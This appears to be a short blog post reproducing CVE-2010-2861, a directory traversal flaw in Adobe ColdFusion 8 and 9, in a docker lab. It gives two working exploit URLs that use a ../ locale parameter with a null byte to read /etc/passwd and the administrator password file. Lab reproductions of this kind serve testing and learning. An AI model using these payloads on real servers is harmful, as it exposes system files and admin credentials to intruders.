Adobe ColdFusion Files Read Vulnerability (CVE-2010-2861)

Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.

A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9, which could allow unauthorized users to read arbitrary files on the server.

Environment construction

Run the following command to start the Adobe CouldFusion 8.0.1 server:

docker-compose up -d

It may take 1 to 5 minutes for the environment to start. After starting http://your-ip:8500/CFIDE/administrator/enter.cfm, you can visit the initialization page, enter the password admin, and start to initialize the entire environment.

Vulnerability to reproduce

Direct access http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en, you can read the file /etc/passwd:

 

 

 

Read the background administrator password http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:

 

Read More:

Leave a Reply

Your email address will not be published. Required fields are marked *